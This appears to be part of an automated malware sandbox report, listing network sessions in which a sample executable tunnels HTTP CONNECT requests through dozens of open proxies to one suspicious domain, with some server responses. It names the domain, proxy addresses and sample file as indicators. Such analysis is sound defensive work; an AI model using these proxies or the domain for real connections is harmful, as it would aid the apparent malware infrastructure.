                                                                                                      Data Ascii: ...# Id: security.html 285144 2021-06-16 05:02:06Z szhang --><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd"><html><head><meta name="description" content="Zscaler makes the internet safe for businesses by protecting their employees from malware, viruses, and other security threats."><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><title>Internet Security by Zscaler</title><script language="JavaScript">var defLang = 'en_US'</script>...<img alt="Zscaler" src="https://login.zscalertwo.net/img_logo_new1.png">--><style type="text/css">body {background-color:#e3e3e3;font-family:Arial, sans-serif;font-size:12px;color:#4B4F54;}a {cursor:pointer;text-decoration:none;color:#009dd0;}table {margin-top:10px;}td table {margin-top:0;text-align:center;}img {max-height:75px;max-width:430px;}.pg {position:absolute;top:0;bottom:0;left:0;right:0;overflow-x:hidden;white-space:nowrap;}.pg:before {content:"";display:inline-block;heigh


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1795192.168.2.45444391.192.25.15841456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.649441957 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1796192.168.2.454934124.6.155.17031306812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.649555922 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:32.377413034 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.317179918 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:35.147298098 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:38.740886927 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:50.312328100 CET39INHTTP/1.0 200 Connection established


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1797192.168.2.45496383.229.61.19831286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.649558067 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:32.179044962 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:32.865916967 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.975238085 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:36.084395885 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:38.178414106 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1798192.168.2.450028194.233.78.142344716812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.649653912 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.740849972 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:37.741055965 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1799192.168.2.454989211.234.125.34436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.649730921 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1800192.168.2.4549408.213.128.9050016812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.650464058 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1801192.168.2.4549495.44.42.82108086812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.656347990 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1802192.168.2.45493827.75.148.5210806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.656347990 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1803192.168.2.454363129.205.123.21410806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.656697035 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1804192.168.2.452959203.154.39.146806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.658246994 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:32.580832005 CET536INHTTP/1.1 500 Internal Server Error
                                                                                                      Date: Fri, 23 Feb 2024 08:45:32 GMT
                                                                                                      Server: Apache/2.4.29 (Ubuntu)
                                                                                                      Content-Length: 639
                                                                                                      Connection: close
                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 77 65 62 6d 61 73 74 65 72 40 6c 6f 63 61 6c 68 6f 73 74 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66
                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at webmaster@localhost to inform them of
                                                                                                      Feb 23, 2024 09:45:32.580941916 CET295INData Raw: 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72
                                                                                                      Data Ascii: the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at heygirlisheeverythingyo


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1805192.168.2.454973141.94.174.6595836812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.659765959 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1806192.168.2.45500343.153.55.2054436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.660007000 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1807192.168.2.454937125.122.26.24210806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.665205002 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1808192.168.2.450338167.172.159.43601536812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.670241117 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.681773901 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1809192.168.2.45010245.117.179.17935476812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.670243025 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.740916967 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:37.741053104 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:43.834387064 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:55.834268093 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:19.912446022 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1810192.168.2.453026162.241.79.22367496812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.734834909 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.740917921 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1811192.168.2.45495737.235.24.19431286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.734925032 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1812192.168.2.45028372.167.220.46157586812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.735497952 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1813192.168.2.454962154.66.108.3236296812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.791835070 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1814192.168.2.45447598.162.25.7316536812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.799187899 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1815192.168.2.454469174.136.57.169304536812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.799221039 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.850227118 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:37.859224081 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1816192.168.2.453015171.244.140.160238676812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.799845934 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:32.681121111 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.865869999 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1817192.168.2.45040537.252.13.24831286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.806941032 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.866035938 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:37.866036892 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:43.865704060 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:55.865540028 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:07.881162882 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:19.959433079 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1818192.168.2.45035146.182.6.69630496812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.819696903 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.850193977 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:37.859046936 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1819192.168.2.4549748.213.129.2010806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.819834948 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1820192.168.2.450135103.134.38.8956786812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.820157051 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1821192.168.2.45500182.113.157.122312806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.833252907 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:32.039539099 CET39INHTTP/1.0 200 Connection established


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1822192.168.2.45498085.214.249.8431286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.833797932 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:36.383732080 CET39INHTTP/1.1 200 Connection established


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1823192.168.2.454987177.135.83.24456786812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.855961084 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1824192.168.2.454497178.253.200.20910806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.856420994 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1825192.168.2.450235182.160.110.15498986812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.868757963 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:32.855272055 CET19INHTTP/1.1 200 OK


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1826192.168.2.450281107.148.201.157806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.882600069 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:32.113416910 CET309INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx/1.24.0
                                                                                                      Date: Fri, 23 Feb 2024 08:45:32 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 157
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.24.0</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1827192.168.2.455019104.25.115.125806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.919965029 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:32.007657051 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:31 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


